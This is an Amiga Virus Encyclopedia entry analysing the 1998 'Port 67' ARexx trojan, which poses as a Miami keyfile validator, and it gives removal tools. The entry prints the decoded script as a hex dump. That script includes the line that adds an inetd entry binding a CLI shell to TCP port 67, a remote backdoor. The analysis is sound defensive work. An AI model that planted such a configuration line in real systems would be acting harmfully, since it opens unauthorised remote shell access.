Port 67 BBS Trojan - Amiga Virus Encyclopedia

VIRUS HELP TEAM



------------------------
Amiga Virus Encyclopedia
Port 67 BBS Trojan
------------------------


  -Port-67-Trojan    (Computer-Takeover)
   Other name: MKey.exe Fake 

    A Arexx-Program.
    Encryption is the same as Port-1599-Trojan, on a Byte to Byte level.
    VT can remove virus.
    Filename: mkey.exe Length: 1880 Bytes
    After File-ID:

    .--------------------------------------.
    |So rumour has it Holger has released a|
    |virus to harm users with fake miami   |
    |keyfiles. This will check your keys to|
    |ensure its safe to use, dEN saves ya  |
    |and fists Holgers ass!                |
    `--------------------------------------'
        }-- dEN 3/3/98   pHuKeRs --{


    Uncoded in the file can be read:
          01014e75 24564552 3a202d4d 69616d69 ..Nu$VER: -Miami
          204b6579 2046696c 65205661 6c696461  Key File Valida
          746f7220 76312e30 2d20a964 454e5e70 tor v1.0- .dEN^p
          484b2069 6e203139 39380a00          HK in 1998..

    Within mkey.exe is a multi-coded area.
    In memory emerges:
          00000070 2f2a202a 2f0a2020 20205361 ...p/* */.    Sa
          79202727 0a202020 20536179 20274d69 y ''.    Say 'Mi
          616d6920 4b657966 696c6520 56616c69 ami Keyfile Vali
          6461746f 7220a96f 44654420 62792064 dator .oDeD by d
          454e5e50 486b2031 39393827 0a202020 EN^PHk 1998'.
          20536179 2027270a 20202020 53617920  Say ''.    Say
          27527566 662c2062 75742066 69727374 'Ruff, but first
          20746f20 63686563 6b21270a 0a6f7065  to check!'..ope
          6e282773 63726970 74272c27 456e7641 n('script','EnvA
          72633a4d 69616d69 6368616e 67654442 rc:MiamichangeDB
          272c2757 27290a77 72697465 6c6e2827 ','W').writeln('
          73637269 7074272c 27414444 20696e65 script','ADD ine
          74642064 61792073 74726561 6d207463 td day stream tc
          7020646f 73206269 6e205072 74206e65 p dos bin Prt ne
          77636c69 20746370 3a363727 290a636c wcli tcp:67').cl
          6f736528 27736372 69707427 290a0a49 ose('script')..I
          46204f50 454e2827 74686572 65272c27 F OPEN('there','
          6d69616d 693a4d69 616d692e 6b657931 miami:Miami.key1
          272c2752 27290a54 48454e20 63686563 ','R').THEN chec
          6b322829 0a454c53 45205361 79202727 k2().ELSE Say ''
          0a202020 20536179 20274b65 79203120 .    Say 'Key 1
          69732062 6164206f 72206e6f 6e206578 is bad or non ex
          69737461 6e74270a 20202020 53617920 istant'.    Say
          27446964 20796f75 206d616b 65206120 'Did you make a
          4d69616d 693a2061 73736967 6e20746f Miami: assign to
          20796f75 72206b65 79733f27 0a202020  your keys?'.
          20536179 2027270a 45786974 0a0a6368  Say ''.Exit..ch
          65636b32 3a0a4946 204f5045 4e282774 eck2:.IF OPEN('t
          68657265 32272c27 6d69616d 693a4d69 here2','miami:Mi
          616d692e 6b657932 272c2752 27290a54 ami.key2','R').T
          48454e20 646f6e65 28290a45 4c534520 HEN done().ELSE
          53617920 27270a20 20202053 61792027 Say ''.    Say '
          4b657920 32206973 20626164 206f7220 Key 2 is bad or
          6e6f6e20 65786973 74616e74 270a2020 non existant'.
          20205361 79202742 65747465 7220676f   Say 'Better go
          20616e64 20676574 20736f6d 65746869  and get somethi
          6e672062 65747465 7221270a 20202020 ng better!'.
          53617920 27270a45 7869740a 0a646f6e Say ''.Exit..don
          653a0a53 61792027 270a5361 7920272b e:.Say ''.Say '+
          2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ----------------
          2d2d2d2d 2d2b270a 53617920 277c3d2d -----+'.Say '|=-
          3d2d4b65 79732061 72652066 696e652d =-Keys are fine-
          3d2d3d7c 270a5361 7920272b 2d2d2d2d =-=|'.Say '+----
          2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ----------------
          2d2b270a 65786974 0a0a7265 7475726e -+'.exit..return
          20310000                             1..

    Second opinion: (Thanks)
    The critical part is:

    writeln('script','ADD inetd day stream tcp dos bin Prt newcli tcp:67')

    This changes the Preferences of Miami. Every time Miami starts a Cli,
    tied into TCP: Port 67, and not into CON:

    The text refering to key1 an 2 is only a smokescreen.

    Also see Port-1599-Trojan

    Removal: Kickstart 1.2 & 1.3 : VT-Schutz v3.17
             Kickstart all others: VirusZ III with Xvs.library installed


    ------------------------------------------------------
    Translated to English by Steen Jacobsen © 2001 VHT-DK.
    Org. text by Heiner Schneegold (VT-Kent)
    ------------------------------------------------------


    


Virum Help Team
Denmark & Canada
Copyright © All rights reserved
www.vht.dk